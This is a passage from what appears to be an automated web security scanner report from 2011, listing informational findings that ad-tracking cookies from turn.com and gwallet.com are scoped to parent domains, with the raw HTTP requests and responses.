Set-Cookie: pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAtEibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1uuItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNz
v-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 15:39:03 GMT

GIF89a.............!.......,...........D..;

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xa
xbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; 
rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15153%7C15153%7C15156%7C15151%7C15153%7C15153%7C15156%7C15146%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15156%7C15153%7C15153%7C15149%7C15153%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15153; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
Content-Length: 0
Date: Wed, 06 Jul 2011 11:21:55 GMT


9.41. http://rs.gwallet.com/r1/pixel/x1094

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1094

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=553&_radium=0
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


9.42. http://rs.gwallet.com/r1/pixel/x1225

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1225

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://bstats.adbrite.com/adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


9.43. http://rs.gwallet.com/r1/pixel/x368

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x368

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x368 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
